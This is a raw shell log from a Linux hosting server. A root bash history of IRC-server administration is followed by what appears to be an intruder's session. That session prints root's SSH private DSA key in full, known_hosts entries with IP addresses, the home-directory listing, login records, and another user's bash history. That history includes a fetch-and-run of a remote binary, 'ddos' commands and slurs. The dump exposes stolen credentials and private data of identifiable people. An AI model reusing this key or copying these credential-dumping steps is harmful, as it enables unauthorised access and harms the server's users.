csf -d 79.126.130.156
w
ls
./unreal stop
./unreal start
nano unrealircd.conf
cd /home/evilcoder
cd /home
ls
cd evilcode/
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
cd /home/excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
nano unrealircd.conf
cd /etc/csf
ls
nano csf.deny
nano unrealircd.conf
cd /home/excodeirc/Unreal3.2
ls
nano unrealircd.conf
nano unrealircd.conf
ls
cd /home
ls
cd pr0be/
ls
su pr0be
ls
su pr0be
nano etc/passwd
nano /etc/passwd
cd /home/tribal
su tribal
ls
cd /root
ls
wget 
http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz
wget http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz
ls
tar -xzf c-ares-1.5.1.tar.gz 
ls
cd c-ares-1.5.1
ls
./configure
ls
cat README
make
cat README
make install
ls
cd /home/tribal
su tribal
w
cd /home/excodeirc
ls
cd Unreal3.2
ls
./unreal stop
nano unrealircd.conf
./unreal start
cd /home
ls
cd evilcode/
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
ls
cd /home/excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
cd /home/excodeirc
ls
mkdir BULLSHIT
ls
rm -rf denora-1.2.0-RC4
rm denora-1.2.0-RC4.tar.gz 
ls
ls psybnc
rm psybnc/
ls
rm -rf psybnc/
ls
rm -rf BULLSHIT/
ls
cd /home/evilcode
ls
cd Unreal3.2/
ls
nano ircd.motd
chown evilcode *
cd /home/excodeirc
cd Unreal3.2
ls
chown excodeirc *
nano unrealircd.conf
ls
ls
w
cd /
nano unrealircd.conf
ls
ls /root
ddos
netstat
ddos
syn
synd
ddos
csf -d 218.186.12.8
ddos 10
ddos
ddos
ddos
ddos
csf
csf -c
csf -l
w
w
cd  /
ls
w
netstat
ls
cd /home/evilcode
ls
cd unreal3.2
cd Unreal3.2
ls
nano unrealircd.conf
cd ../
ls
cd ../
ls
cd excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
dmesg
top
sh tuning*
top
clear
top
w
ls
cd /home
ls
cd excodeirc
ls
mkdir hightechhost
cd hightechhost/
ls
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.18.tar.gz
ls
tar zxvf eggdrop1.6.18.tar.gz 
cd eggdrop1.6.18
./configure 
make config
make
ls
su excodeirc
chown excodeirc *
su excodeirc
w
ls
cd /home
ls
cd excodeirc
ls
cd hightechhost/
ls
cd eggdrop1.6.18
ls
ls -o
su excodeirc
ls
cd /
ls
cd home
ls
cd egg
ls
cd eggdrop
ls
su egg
uname -a
id egg
su egg
netstat | grep 33162
netstat
killall fight
netstat
killall fight
ps -aux
su egg
netstat
uname -a ; id egg
su egg
ls
cd /home/egg
ls
cd efnet/
su egg
w
w
ls
cat cores
ls
cd /home
ls
cd evilcode/
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
nano unrealircd.conf 
nano unrealircd.conf 
nano unrealircd.conf 
nano unrealircd.conf 
nano unrealircd.conf 
nano unrealircd.conf 
cd /home/excodeirc
ls
cd Unreal
ls
cd Unreal3.2
ls
nano unrealircd.conf
cd /home/evilcode
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
cd /home/excodeirc
ls
cd Unreal3.2
ls
nano unrealircd.conf
cd /home/evilcode
ls
cd Unreal3.2/
ls
nano unrealircd.conf 
./Config 
make
./unreal stop
./unreal start
ps -aux | grep ircd
kill 3952
kill 10281
ps -aux
kill 12472
killall ircd
./unreal start
ls
./Config 
make
./unreal start
cd $user
ls
mkdir newircd
cd newircd
ls
wget http://www.blurryfox.com/unreal/Unreal3.2.7.tar.gz
ls
tar xzf Unreal3.2.7.tar.gz 
ls
cd Unreal3.2.7
ls
./Config 
ls
cd /home
ls
cd evilcode/
ls
su evilcode
w
w
ps -aux | grep ircd
ls
cd /home
ls
cd evilcode/
ls
cd newircd/
ls
su evilcode
w
ls
cd /
ls
cd evilcode
ls
cd /home
ls
w
cd evilcode/
ls
w
netstat -a
la
ls
su evilcode
ls
su evilcoder
su evilcode
ls
who
cd /
cd /home
ls
cd evilcode
ls
cd newircd/
ls
cd Unreal3.2.7
ls
su evilcode
w
ls
cd /
ls
cd /home/evilcode
ls
cd newircd
ls
cd Unreal3.2.7
ls
nano unrealircd.conf
ls
cd /
ls
cd home
ls
cd excodeirc/
ls
cd Unreal3.2
ls
nano unrealircd.conf
./unreal stop
./unreal start
./unreal start
./unreal stop
nano unrealircd.conf
./unreal start
./unreal stop
uptime
./unreal stop
nano unrealircd.conf
w
passwd sn00ges
passwd sn00g3s
cat ircd.conf
cat ircd.log
netstat -a
nst
netstat -a
w
ls
w
cd /
ls
cd evilcode
cd /home
ls
cd evilcode/
ls
cd newircd/
su evilcode
csf -a 71.105.242.232 /etc/csf
last | grep root
nst
cat /boot/grub/grub.conf
cd /usr/src
ls
rm -rf linux*
wget sstdns.com/kernel.tar.gz
wget nix101.com/kernel.tar.gz
tar zxvf kernel.ta.gz
tar zxvf kernel.tar.gz
ln -s linux-2.6.24.3 linux
cd linux
rm -rf .config
wget sstdns.com/grsec
mv grsec .config
screen
w
ps -aux ; grep ircd
cd /home
cd evilcode
ls
su evilcode
w
ls
cd /
ps -aux
kill 19912
kill 11341
ps -aux
kill 11341
kill 11341
ps -aux
kilall fight
kill fight
kill 3534
kill 3537
kill 3540
kill 3543
kill 3546
kill 3549
ps -aux
kill 1439
kill 1499
ps-aux
ps -aux
w
ddos
netstat -a
ls
ls home
cd home
ls
ls pvannet
ls pvannet/public_html
ls
ls aosw
ls aosw/public_html
csf -a 63.173.63.241 /etc/csf
nano /etc/csf/csf.deny
ping 63.173.63.241
tracert 63.173.63.241
ls
w
cd /home
ls
cd g00ns83
ls
ls public_html/
ls
cd /
ls
cd home
ls g00ns83/backup
mv g00ns83/backup/oldlayout g00ns83/public_html
w
cd /home/evilcode
cd newircd/
su evilcode
ddos
syn
netstat
netstat -a
ddos
ddos 10
ls
csf -r
ls
nano /etc/csf/csf.deny 
ls
cd /
l
ls
cd /
ls
cd /evilcode
ls
cd /home/evilcode
ls
cd newircd/
ls
cd Unreal3.2.7
su evilcode
w
cd /
cd /home
ls
cd evilcode/
ls
cd newircd/
ls
cd Unreal3.2.7
ls
su evilcode
ls
cd ../../
ls
ls evilcode
ls
ps -aux
ls
cd /home
ls
cd evilcode
ls
cd Unreal3.2
ls
ps -aux
ls
su evilcode
cd /home/evilcode
ls
cd newircd
ls
cd unreal3.2.7
cd Unreal3.2.7
ls
su evilcode
ls
w
cd /
ls
cd /home
cd evilcode/
ls
cd newircd
l
ls
cd Unreal3.2.7
ls
su evilcode
ls
cd /
ls
cd home
ls
cd excodeirc/
ls
mv Unreal3.2 privateirc
ls
mv privateirc/ Unreal3.2
cp Unreal3.2 privateircd
ls
cp Unreal3.2 privateircd
ls Unreal
ls Unreal3.2
su excodeirc
ls
cd /
cd /home
ls
cd egg/
ls
cd eggdrop
ls
nano v0ltr0n.conf
nano v0ltr0n.chan
./eggdrop-1.6.18 v0ltr0n.conf 
su egg
w
passwd g00ns83
w
ls
cd /
su
ls
make install
su sixtyz
su sixtyz
ls
cd /home/sixtyz
ls
mkdir wee
cd wee
su sixtyz
ls
su sixtyz
ls
cd /
su sixtyz
su sixtyz
ls
cd /
ls
cd /home
ls
cd g00nsts395/
ls
cd ts
ls
su g00nsts395
ls
ps -aux
cd /home
ls
cd evilcode
ls
cd newircd
ls
cd Unreal3.2.7
ls
nano unrealircd.conf
su evilcode
up
last
last / grep root
cd /var/log/httpd/domains
ls
cat g00ns.net.log | grep 403
cat g00ns.net.log 
cat g00ns.net.log | grep http
cat g00ns.net.log | grep regime
cat g00ns.net.log | grep c99
cat g00ns.net.log | grep shell
cat g00ns.net.log | grep 406
cat g00ns.net.log | grep 403
htc
cat g00ns-forum.net.log | grep 403
[root@demon2 ~]# ls -al .ssh
total 24
drwx------  2 root root 4096 Feb 10 12:55 .
drwxr-x--- 14 root root 4096 Mar 27 16:14 ..
-rw-------  1 root root  668 Jul 31  2007 id_dsa
-rw-r--r--  1 root root  612 Jul 31  2007 id_dsa.pub
-rw-r--r--  1 root root 2630 Apr 14 11:40 known_hosts
[root@demon2 ~]# cat .ssh/*
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCr+zFL0Hd8ONiBNi9HwL/rgZcyIi/cHbbhZ/Sra2AaDfSFivL5
XmtmaFgSVPbxCLWgxCtM8E8MGX/T/c/A2EFwqHfXgjLAyMNBuKDfumVYMwH51smL
u5FrJhjt4qRgPnnG3W5Y1BkyoX28HvgnYHVNIGXcXe7GTutcIyGrrmYDNQIVAIKN
sRm7Oi3Ql4Nc9/R997aQiZpNAoGAeDuTtliW+zn9ki5EKTVZCTM0EhGxarDF8JOz
6JPfAlCpHEBtpNkQwmM1Gi8/XHPmAfDnNV0Na02XruhNk1UnWITBlqdU73Q413zx
LkWtyoPLECz2ySjpbTtatkcOTlDKroyZBxBEZPd3zLNClWfKAbW3mj02Pp5eMA11
eSfZoV8CgYAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+
n/UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJp
xp6T7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbAIUeUGslYXH
8q7BsyrkvGrDpQAhjSI=
-----END DSA PRIVATE KEY-----
ssh-dss AAAAB3NzaC1kc3MAAACBAKv7MUvQd3w42IE2L0fAv+uBlzIiL9wdtuFn9Kt
rYBoN9IWK8vlea2ZoWBJU9vEItaDEK0zwTwwZf9P9z8DYQXCod9eCMsDIw0G4oN+6ZV
gzAfnWyYu7kWsmGO3ipGA+ecbdbljUGTKhfbwe+CdgdU0gZdxd7sZO61wjIauuZgM1A
AAAFQCCjbEZuzot0JeDXPf0ffe2kImaTQAAAIB4O5O2WJb7Of2SLkQpNVkJMzQSEbFq
sMXwk7Pok98CUKkcQG2k2RDCYzUaLz9cc+YB8Oc1XQ1rTZeu6E2TVSdYhMGWp1TvdDj
XfPEuRa3Kg8sQLPbJKOltO1q2Rw5OUMqujJkHEERk93fMs0KVZ8oBtbeaPTY+nl4wDX
V5J9mhXwAAAIAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+n
/UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJpxp6T
7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbA== 
root@server.domain.com
72.20.5.94 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAz6mhC9bjyFZ4EYXzRu2C
Z8QLdxeSm9z5Y4svIrDM7xWD11MsWArRV6FAdb29NKCTVGu4Bn/jZmvjzG0W8mSd1b4
AzdOm/T24+nGdfgKujuTonEHO3xMPomTdvmYsKYgn7JYboa5meUXD2hJJZ/nZUq2aSe
7ByYsS5vCEsBHGIv0=
69.42.223.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAx8MbaIB8gbYx6GMEEO
jwSfkeq4n/8c5erPuGuQH/oJUkU6DD1KDkqKwptS4PkiAMZVV93tU/VBo3MT1i0YVQl
TRWyg8sKuwsNv0f0x0day2qsoz0lSNYnjKXWYLqT1qryv1slI4BXuQB1jhr5dARBmVL
+YCNx6OSxvt7Q9m0JwtTqQayOm6Zcab/H3pm97nrYKRRxX3ikdXJdnekCwJw5BPZcyp
dqLlowB9hbVijWVnVZAYg96HssBRR6WxxNAPOLmCj/8bx4fLnNHu2F9tLdcNyzGMUuD
bLxYI+06Nwtk3fovpKwo+b/DmfcHaF4Lkm96pWpuhc6oduxh6ySvlviw==
halturnershow.com,208.53.158.3 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA
7ry8evVeuNNH0+p9VXPMqqPgp9NjMx/EDUj7hnGwreKYWyCybTitmpGgTDFTuu8YZGA
r+ssHoF2FMkr1lTF82IIsMx+EXMkoQJ0/SvMBO/gJiIsBRTU13n6Ad8FQZBCBez0dkz
RI0msupnbWnytPvqu9j0/pErPzaGWrINB+6N63Cs241GU6Lt8EG6RX4UVgBTSm8aold
+Ixpy+lmwTh3CNJu5zFtoCmmg7rCiQ7sn8ci4Rqq6YzV7LhzRyIiGRzH448v3/dDaUa
f2ENIvycEz27ZezeB2g5B5icTPH+VQNhqTohEtoQec0vHqA9CzSExXufDlS4is+F7dJ
LcA0Tnw==
74.86.141.218 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuSVqCiY8KhmN3OHYH
lu03zkoGIMIGQPaM0bM6alUQPl7H7iAF9WOqaQ7OjpsBxvQO7/tchkP9Azy40W428OK
gg61XDrJoy/fBnOXAmvAKj42N7l3engj9P7MN229DDH0ygM/o1ykP7bob5MZx5BSzFu
DYaQtK+OhuhbsNiXOGCtIXPQ6XLRSo72GKoFzT4Y1Kc/Pux0lXrA7JrX8cOw24TgkQ1
4Xh9vWRUXnxlq2HkrLT2VPrJ50Rl4feDSScqGyvXtQDuWrIsLdk5sA9EhIIqYbYsJUU
oHcIh30tOyOUoPcg3KTbk7gcInMGl3k7IOTZHI17wqOiNu1qIWYcGr1Tw==
apu.711chan.org,89.46.37.242 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnv
nw1ZMHvmPzZ1cNLYwYYmUWVw5xncnMe/S/yyTwQ23kpDf6Ut0z/wpKeQd+m3XTiwzDU
NsKLdIkUpZLucbqjBE1XlNF9pHqKqX1j5rvZN/rCNREdJkChWk2KRddSdBOg/Oc81tl
OX6Fjv9zLglbo2y7Ojqx2eML/zifxTTTF82V0czG/bsXdtdhcW4JtVXVoN1iUcvEvZK
AyEN41N/OZDAqUGaEYAjqDpmI/JJM3uCKDl1qelt0iuWZLEOivUp6emnjiQNPKF4Sb1
silje6uETSsjK/n8mIi1YmO/KNRg+MM9LQ2EWe/cS+xAJwyeDT9WiY/k867FjlXxIBP
cu3Lw==
[72.20.6.22]:5000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvmD6suMeQqo2o
NRg9p4nzWttZZfLC1Uhmmnv/Y7YyQRjvBBjr5rAPdbfLxY6nsc4/f6JDmwNKdIn0j6L
AcjFak/kuf7rAJwcolrsRxm4C5LH89D+r32t7guOI9hPgA0R38N7k7q2ykQlDNGyuMJ
p+1UXSAe8t0E+2VSgrr173rqNe+1oRaPWHcUdwoN9O+VmTVg+uS+cvlLSVue8BrUCZS
vcDAOdMXeSOos7kibaQ181juAjHp+xEHd0zfdQxzItP9mMz0lqnY+J/miHuu6sm4G3E
7WEXBLFjaTIZx3OzEg3eDBKpK8EYzXkYY5aq4eNNfCmqZqWdjnEBUwNCxrKGQ==
[72.20.6.190]:9000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAneqXXAJ+LhaK
Kc6z2ugq1C6CojO0ylJCaZaO9WCL1CfstSGVBaEgYUq7qk7MtgGq71IIHuaYTE5KoXR
6l8P+pZaONa/2vSCbmdOg7q/9xBQwmuXC8zKEnR7IqPqYL5idFioGV1G2dWYMTFJySQ
MPI96jW1a4iu5AL61zC2WEr9f8jDjGQ8+FTx8u7zX8GEaEJAQQEr99CpDq29jp7pKNF
BOSo9OW5mDJt2Q8NOotExSdEkmkxrEBcOFshfiEmY99lm4QCjOFVDSxdH5s0VNKdYu0
FBfMRlEh+UXFtL29BuEQUZnMwqU2NqCJknQ1gQawn8pQfYkpf4vBsu/h4/p2ow==
[root@demon2 ~]# cd /home 
[root@demon2 home]# ls -al
total 252
drwx--x--x 50 root       root        4096 Mar 27 16:19 .
drwxr-xr-x 27 root       root        4096 Mar 11 00:10 ..
drwx------  2 40zzz      40zzz       4096 Dec 21 21:57 40zzz
drwx--x--x 17 admin      admin       4096 Feb 11 22:44 admin
drwx--x--x  6 alliancedn alliancedn  4096 Aug  1  2007 alliancedn
drwx--x--x  8 aosw       aosw        4096 Aug  1  2007 aosw
-rw-------  1 root       root       13312 Apr 21 05:01 aquota.group
-rw-------  1 root       root       13312 Apr 21 05:01 aquota.user
drwxr-xr-x  3 root       root        4096 Jan 14 00:10 asbestos
drwx--x--x  9 barnseo    barnseo     4096 Mar  5 23:19 barnseo
drwx--x--x  6 bnc        bnc         4096 Aug  8  2007 bnc
drwx--x--x  6 bored      bored       4096 Aug  1  2007 bored
drwx--x--x  6 churc0     churc0      4096 Aug  1  2007 churc0
drwx--x--x  6 connors    connors     4096 Aug  1  2007 connors
drwx------  3 cstest     cstest      4096 Dec 11 17:29 cstest
drwx------  2 cunt       cunt        4096 Mar 13 17:26 cunt
drwx--x--x  5 dougie     dougie      4096 Dec 20 16:28 dougie
drwx--x--x 10 egg        egg         4096 Mar 23 11:26 egg
drwx--x--x  6 every      every       4096 Aug  1  2007 every
drwxr-xr-x  9 evilcode   evilcode    4096 Mar 25 13:40 evilcode
drwx--x--x 25 excodeirc  excodeirc   4096 Apr 14 22:26 excodeirc
drwx--x--x  6 exploiterc exploiterc  4096 Dec 15 13:10 exploiterc
drwx--x--x  7 felosi     felosi      4096 Feb 10 12:51 felosi
drwx--x--x  6 felosii    felosii     4096 Aug  1  2007 felosii
drwxr-xr-x  2 root       root        4096 Apr 22  2007 ftp
drwx--x--x  9 g00ns83    g00ns83     4096 Apr 18 21:47 g00ns83
drwx--x--x 10 g00nsts395 g00nsts395  4096 Apr 16 19:57 g00nsts395
drwx--x--x  7 grumpy     grumpy      4096 Aug  1  2007 grumpy
drwx--x--x  4 hackrad    hackrad     4096 Aug  2  2007 hackrad
drwx--x--x  5 hanon      hanon       4096 Mar 23 16:25 hanon
drwx------  2 silc       silc        4096 Jan  4 23:12 help
drwx--x--x  7 hthhost    hthhost     4096 Dec 30 14:59 hthhost
drwx------  2 ident      ident       4096 Feb  1 00:01 ident
drwx--x--x  7 illmob     illmob      4096 Apr  1 04:21 illmob
drwx--x--x  5 lost       lost        4096 Feb 19 19:07 lost
drwx------  2 root       root       16384 Jul 31  2007 lost+found
drwx--x--x  6 mycorp     mycorp      4096 Aug  2  2007 mycorp
drwx--x--x  8 party      party       4096 Mar  7 18:20 party
drwx--x--x  5 partyvan   partyvan    4096 Jan  1 15:04 partyvan
drwx--x--x  7 pingyill   pingyill    4096 Aug  1  2007 pingyill
drwx--x--x  5        564        565  4096 Mar  9 11:56 pr0be
drwx--x--x  5 pvannet    pvannet     4096 Mar 26 19:13 pvannet
drwx--x--x  6 ragedns    ragedns     4096 Aug  2  2007 ragedns
drwx--x--x  6 rageserver rageserver  4096 Aug  1  2007 rageserver
drwx--x--x  6 robo       robo        4096 Aug  1  2007 robo
drwx--x--x 15 shoutcas   shoutcas    4096 Aug  6  2007 shoutcas
drwx------  3 silc       silc        4096 Jan 18 16:08 silc
drwx--x--x  7 sixtyz     sixtyz      4096 Apr 16 19:09 sixtyz
drwx--x--x 10 sn00g3s    sn00g3s     4096 Apr  3 01:33 sn00g3s
drwxrwxrwt  2 root       root        4096 Apr 21 00:10 tmp
drwx------  5 tribal     tribal      4096 Mar 26 07:36 tribal
drwx--x--x  6 void       void        4096 Aug  1  2007 void
[root@demon2 home]# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    74-34-107-191.ds Mon Apr 21 03:44:04 -0700 2008
barnseo          pts/1    86.121.190.64    Wed Mar  5 23:05:21 -0800 2008
bnc              pts/1    78.129.174.155   Sat Apr 19 20:27:10 -0700 2008
partyvan         pts/5    cpe-76-174-156-5 Tue Jan  1 15:27:39 -0800 2008
[root@demon2 home]# cd 40zzz
[root@demon2 40zzz]# ls -al
total 24
drwx------  2 40zzz 40zzz 4096 Dec 21 21:57 .
drwx--x--x 50 root  root  4096 Mar 27 16:19 ..
-rw-r--r--  1 40zzz 40zzz   24 Dec 21 21:57 .bash_logout
-rw-r--r--  1 40zzz 40zzz  176 Dec 21 21:57 .bash_profile
-rw-r--r--  1 40zzz 40zzz  124 Dec 21 21:57 .bashrc
[root@demon2 40zzz]# cd ../admin
[root@demon2 admin]# ls -al
total 119196
drwx--x--x 17 admin admin      4096 Feb 11 22:44 .
drwx--x--x 50 root  root       4096 Mar 27 16:19 ..
lrwxrwxrwx  1 root  root         21 Sep 13  2007 admin_backups -> /backup/admin_backups
drwxrwxr-x  2 admin admin      4096 Aug  1  2007 admin_backups1
drwx------  2 admin admin      4096 Aug  1  2007 backups
-rw-------  1 admin admin      5774 Feb 11 22:50 .bash_history
-rw-r--r--  1 admin admin       304 Apr 27  2006 .bash_logout
-rw-r--r--  1 admin admin       191 Apr 27  2006 .bash_profile
-rw-r--r--  1 admin admin       124 Apr 27  2006 .bashrc
-rw-rw-r--  1 admin admin      6090 Jul  2  2007 da.cpanel.import.9beta1.tar.gz
-r--r--r--  1 admin admin     20320 May 26  2007 da.cpanel.import.pl
-rwxr-xr-x  1 admin admin       272 Aug  6  2007 defaults.conf
drwxr-xr-x  9 admin admin      4096 Jul  4  2007 domains
drwx------  2 admin admin      4096 Sep 29  2007 .elinks
-rw-r--r--  1 admin admin       383 Apr 27  2006 .emacs
drwxr-xr-x  4 admin admin      4096 Aug  1  2007 ex
drwxrwxr-x  2 admin admin      4096 Oct 11  2007 export
drwxrwx---  5 admin admin      4096 Aug  1  2007 imap
drwxrwxr-x  2 admin admin      4096 Oct 11  2007 import
drwx------  2 admin admin      4096 Aug  1  2007 mail
drwxrwxr-x  2 admin admin      4096 Jan  4  2007 .mc
drwxr-xr-x  6 admin admin      4096 May 15  2006 modsecurity-apache_1.9.4
-rw-rw-r--  1 admin admin    496805 Jan 11  2007 modsecurity-apache_1.9.4.tar.gz
-rw-------  1 admin admin       419 Sep 29  2007 .nessusrc
drwxr-xr-x  2 admin admin      4096 Jul  3  2007 public_html
-rw-r--r--  1 admin admin     55412 Jul  3  2007 rulezz.conf
-rw-r-----  1 admin mail         34 Jun 29  2007 .shadow
drwx------  2 admin admin      4096 Aug  1  2007 .ssh
-rwx------  1 admin admin      8515 Feb 10 15:41 t
-rw-r--r--  1 admin admin    213250 Aug  1  2007 user.admin.alliancedn.tar.gz
-rw-r-----  1 admin admin 120993882 Aug  1  2007 user.admin.sn00g3s.tar.gz
drwx--x--x  2 admin admin      4096 Dec  8 10:00 user_backups
drwxr-xr-x  3 admin admin      4096 Sep 29  2007 webmail
[root@demon2 admin]# cat .bash_history 
cd
cd user_backups
ftp premshells.com
ping rst-crew.net
exit
cdf
cd
cd user_backups
ftp premshells.com
uptime
nst
exit
cd
cd userbackups
cd user_backups
ftp blackhat-hosting.com
exit
ftp black-hosting.com
ftp blackhat-hosting.com
updatedb
exit
nano -w /etc/apf/deny_hosts.rules
exit
cd user_backups
cd
cd user-backups
cd user_backups
ls
cp rosec.tar.gz /home/admin/domains
cd /home/admin/domains
ls
mv rosec.tar.gz cpl.alliancedns.com
cd cpl.alliancedns.com
mv rosec.tar.gz public_html
exit
cd
mc
chmod 644 rosec.tar.gz
exit
cd
ls
rm -rf backup user_backups
mkdir /home/admin/admin_backups
ping zone-h.org
exit
cd
ls
ls
mkdir user_backups
cp *.tar.gz user_backups
exit
cd
chmod 755 domains
ls -la domains
exit
cd
chmod 755 domains
cd
exit
cd
ls
mv *.tar.gz user_backups
ls
ls user_backups
exit
crontab -e
exit
cd
ls
ls admin_backups
rm -rf admin_backups 
cat /etc/hosts
ls
mkdir admin_backups
exit
cd
cd admin*
ls
ls
ls
exit
cd
ls
cd admin*
ls
rm -rf */tar.gz
ls
rm -rf *tar.gz
ls
exit
cd
cd admin*
ls
cat /etc/hosts
exit
cd
ls
mv user.admin.aosw.tar.gz admin_backups
ls admin*
ls -la admin*
top
exit
cd
ls
rm -rf backup-8.1.2007_11-19-41_g00ns83.tar.gz
wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz'
wget http://kade.nu/da/da.cpanel.import.9beta1.tar.gz
tar zxvf da.cpanel.import.9beta1.tar.gz
nano -w defaults.conf
exit
nano -w defaults.conf
chmod 755 defaults*
nano -w defaults.conf
mkdir import export
rm -rf import
mv cp import
ls
perl da.cpanel.import.pl
mkdir user_backups
perl da.cpanel.import.pl
ls user*
ls -la export
cd
ls
cd export
ls
rm -rf niggerma.tar.gz sevenz.tar.gz
mv *.tar.gz ../user_backups
ls
cd ..
ls -la user_backups
exit
cd
ls
ls -la
rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz
ls import
cd import
ls -la
rm -rf backup*
ls -la
ls -la
ls -la
ls -la
exit
cd
ls -la
cd import
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
rm -rf backup-8.2.2007_18-32-22_g00ns83.tar.gz
ls
ddos
exit
cd
cd import
ls
ls
cd
wget nix101.com/mod.tar.gz
wget http://www.modsecurity.org/download/modsecurity-apache_1.9.4.tar.gz
tar zxvf modsecurity-apache_1.9.4.tar.gz
cd mod*
cd apache1
apxs
apxs -cia mod_security.c
yum install httpd-devel
exit
cd
cd import
ls
exit
cd
cd import
ls
cd
ls
cd import
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
nst
exit

cd
cd import
ls -la
ls -la
ls -la
ls -la
ls -la
exuit
exit
cd
cd import
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
ls -la
exit
/cd
ls
perl da.cpanel.import.pl
cd export
ls
mv g00ns* ../user_backups
ping demon2.rage-servers.com
cd
cd /backup
ls
nano test
rm -rf test
exit
cd
ls
ls backup
rm -rf backup
top
exit
su admin
id
cd
ls
ls export
exit
cd
cd import
ls
rm -rf *.tar.gz
ftp 209.200.50.124
ls
rm -rf back*
cd
cd import
ftp 209.200.50.124
quit
ftp 209.200.50.124
cd
ls
nano -w defaults.conf
perl da.cpanel.import.pl
ls export
cd import
ls
cd
cd export
ls
cp shoutcas.tar.gz ../user_backups
cd /home/shou*
exit
cd
ls
ls -la export
ls -la user_backups
exit
cd
csf -a 72.20.1.46
exit
cd
ftp 72.20.1.46
ls
mv your* user_backups
exit
cd
cd domains
ls
cd premshells.com
ls
cd public_html
ls
exit
cd
cd domains
cd prem*
wget protectedhost.com/stat.tar.gz
tar zxvf stat*
LS
ls
tar zxvf stat.tar.gz
mv status public_html
cd
cd domains
ls
cd premshells.com
cd public_html;
wget http://enterprise.bidmc.harvard.edu/pub/nessus-php/nessus-php-0.7.tar.gz
tar zxvf nessus-php-0.7.tar.gz
mv nessus-php-0.7/ nes
links http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386
	.rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4
wget http://cgi.tenablesecurity.com/nessus3dl.php?file=Nessus-3.0.6-es5.i386.
	rpm&licence_accept=yes&t=aefdb0eaf2b035d672a91d4b551187b4
rm -rf index.html.1
killall links
wget shitonkikes.com/Nessus-3.0.6-es5.i386.rpm
rpm -i Nessus-3.0.6-es5.i386.rpm
exit
exit
./configure
cd /opt
ls
cd ness*
ls
ls sbin
sbin/nessus-adduser
exit
cd
cd import
ftp cp2.secureservertech.com
cd ..
ls
nano -w defaults.conf
ls import
rm -rf import/backup-8.6.2007_22-02-36_shoutcas.tar.gz
perl da.cpanel.import.pl
ls export
cp export/stockegg* user_backups
ls user-Backups
ls user_backups
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
ping www.stockegg.com
service named restart
exit
cd
cd user_*
ls
ftp sst0.com
cd
cd user_*
ls -la aryan88*
ftp sst0.com
exit
cd
cd user_*
ftp sst0.com
cd
ls
exit
cd
ls
wget fearlesshost.com/t
chmod 700 t
./t
exit
[root@demon2 admin]# ls -al .ssh
total 12
drwx------  2 admin admin 4096 Aug  1  2007 .
drwx--x--x 17 admin admin 4096 Feb 11 22:44 ..
-rw-r--r--  1 admin admin  220 Aug  1  2007 known_hosts
[root@demon2 admin]# cat .ssh/*
72.20.1.46 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6qCFv8UowWc3dcRnWqzz4tPsx4Glt
EUA4rRmt/tsP0T4bsddMuF0yYvaSHVAZNjZwfup0heDh/cCs08AiGlKDL3yvNO4nTa/sXKr1AJ0W
dg0GMnhT+D0Mu8PXdCKhIfPZLsaW5p45WYmwy6afKxM20wZNVKw3YTXJweFE6n0s9M=
[root@demon2 admin]# ls -al /backup/admin_backups
total 28936116
